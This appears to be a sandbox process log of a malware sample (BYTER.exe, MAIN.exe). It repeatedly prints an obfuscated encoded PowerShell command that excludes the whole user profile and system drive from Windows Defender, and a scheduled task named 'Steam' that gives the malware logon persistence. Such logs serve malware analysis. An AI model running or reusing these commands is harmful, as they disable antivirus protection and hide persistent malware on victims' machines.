"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp70DC.tmp.bat""
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-531399342165778056906781422141363396-1060219291-5034032141905332277-563561859"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8057.tmp.bat""
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\timeout.exe
timeout 3
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3209356941771363768-599244579-17035025121542075587-291538739524266970-2106023698"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Roaming\Steam.exe
"C:\Users\Admin\AppData\Roaming\Steam.exe"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
